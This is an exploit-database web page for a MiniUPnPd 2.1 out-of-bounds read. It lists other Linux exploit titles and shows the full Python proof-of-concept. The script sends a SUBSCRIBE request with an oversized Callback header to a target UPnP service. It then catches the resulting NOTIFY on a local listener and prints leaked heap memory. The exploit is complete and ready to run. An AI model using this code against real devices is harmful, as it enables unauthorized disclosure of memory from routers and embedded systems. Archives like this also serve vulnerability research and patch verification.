Menu

Improved exploit search engine. Try python and hit enter

"MiniUPnPd 2.1 - Out-of-Bounds Read"

Author

b1ack0wl

Platform

linux

Release date

2019-01-29

Release Date Title Type Platform Author
2019-03-11 "Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak" dos linux wally0813
2019-03-07 "Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)" remote linux Metasploit
2019-03-06 "Linux < 4.20.14 - Virtual Address 0 is Mappable via Privileged write() to /proc/*/mem" dos linux "Google Security Research"
2019-03-04 "FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC)" dos linux "Mr Winst0n"
2019-03-01 "Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module" dos linux "Google Security Research"
2019-02-28 "Usermin 1.750 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-28 "WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service" dos linux "Dhiraj Mishra"
2019-02-22 "Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation" webapps linux SecureAuth
2019-02-20 "MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates" dos linux "Google Security Research"
2019-02-21 "Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)" dos linux "Alejandra Sánchez"
2019-02-13 "runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2)" local linux embargo
2019-02-15 "Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference" dos linux "Google Security Research"
2019-02-12 "Jenkins 2.150.2 - Remote Command Execution (Metasploit)" webapps linux AkkuS
2019-02-11 "CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting" webapps linux DKM
2019-02-13 "snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)" local linux "Chris Moberly"
2019-02-13 "snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)" local linux "Chris Moberly"
2019-02-12 "runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution" local linux feexd
2019-02-11 "Evince - CBT File Command Injection (Metasploit)" local linux Metasploit
2018-10-20 "LibSSH 0.7.6 / 0.8.4 - Unauthorized Access" remote linux jas502n
2019-01-29 "MiniUPnPd 2.1 - Out-of-Bounds Read" dos linux b1ack0wl
2019-01-23 "Nagios XI 5.5.6 - Remote Code Execution / Privilege Escalation" webapps linux "Chris Lyne"
2019-01-24 "Ghostscript 9.26 - Pseudo-Operator Remote Code Execution" remote linux "Google Security Research"
2019-01-28 "MySQL User-Defined (Linux) x32 / x86_64 - sys_exec Function Local Privilege Escalation" local linux d7x
2019-01-24 "AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-21 "GattLib 0.2 - Stack Buffer Overflow" remote linux "Dhiraj Mishra"
2019-01-16 "blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)" local linux Metasploit
2019-01-21 "Linux Kernel 4.13 - 'compat_get_timex()' Leak Kernel Pointer" dos linux wally0813
2019-01-16 "NTPsec 1.1.2 - 'config' Authenticated Out-of-Bounds Write Denial of Service (PoC)" dos linux "Magnus Klaaborg Stubman"
2019-01-16 "NTPsec 1.1.2 - 'ntp_control' Authenticated NULL Pointer Dereference (PoC)" dos linux "Magnus Klaaborg Stubman"
2019-01-16 "NTPsec 1.1.2 - 'ntp_control' Out-of-Bounds Read (PoC)" dos linux "Magnus Klaaborg Stubman"
Release Date Title Type Platform Author
2019-01-29 "MiniUPnPd 2.1 - Out-of-Bounds Read" dos linux b1ack0wl
2016-09-04 "Belkin F9K1122v1 1.00.30 - Buffer Overflow (via Cross-Site Request Forgery)" webapps hardware b1ack0wl
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46278/?format=json')
For full documentation follow the link above

Ads

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/python3
# miniupnpd <= v2.1 read out-of-bounds PoC
# by b1ack0wl
# https://github.com/b1ack0wl/miniupnpd_poc

import requests, socketserver, argparse, sys

class OK_HTTP_Response(socketserver.StreamRequestHandler):
  def handle(self):
    self.request.settimeout(self.server.timeout)
    self.server.notify = b""
    try:
      line = self.rfile.read(1)
      while len(line) > 0:
        self.server.notify += line
        line = self.rfile.read(1)
    except:
      pass
    self.wfile.write(b"HTTP/1.1 200 OK\r\n\r\n")

def splash():
  print("[*] miniupnpd <= v2.1 read out-of-bounds vulnerability [PoC]")
  print("[*] by b1ack0wl")

def leak_data(args):
  leak_size = ((1024*args.leak_amount)+526)
  callback_uri= "A" * leak_size
  headers= {'NT': 'upnp:event', 'Callback': '<http://{}:{}/{}>'.format(args.callback_ip,args.callback_port,callback_uri), 'Timeout': 'Second-20'}
  server = socketserver.TCPServer((args.callback_ip, args.callback_port), OK_HTTP_Response)
  server.timeout = args.timeout
  print("[+] Sending request...")
  requests.request(method="SUBSCRIBE",url="http://{}:{}/evt/L3F".format(args.target_ip,args.target_port),headers=headers,timeout=args.timeout)
  server.handle_request()
  leaked_data = server.notify[1023::] # Skip over the first 1024 bytes since it just contains 'NOTIFY /AAA...'
  print("[+] Leaked Data: {}".format(leaked_data))
  print("[+] Leaked Length: {}".format(len(leaked_data)))
  print("[+] Done")

def main():
  poc_parser = argparse.ArgumentParser( add_help=True, description='Miniupnpd <= v2.1 read out-of-bounds vulnerability',formatter_class=argparse.ArgumentDefaultsHelpFormatter)
  poc_parser.add_argument('target_ip', help='IP address of vulnerable device.')
  poc_parser.add_argument('target_port', default=5000, help="Target Port.", type=int)
  poc_parser.add_argument('--callback_ip', help="Local IP address for httpd listener.", type=str)
  poc_parser.add_argument('--callback_port', help="Local port for httpd listener.", type=int)
  poc_parser.add_argument('--timeout', default=5, help="Timeout for http requests (in seconds).", type=float)
  poc_parser.add_argument('--leak_amount', default=1, help="Amount of arbitrary heap data to leak (in KB).", type=int)
  args = poc_parser.parse_args()
  arguments = ['target_ip', 'target_port', 'callback_ip', 'callback_port' ]
  for i in arguments:
    if getattr(args, i) == None:
      poc_parser.print_help()
      sys.exit(1)
  leak_data(args)

if __name__ == '__main__':
    splash()
    main()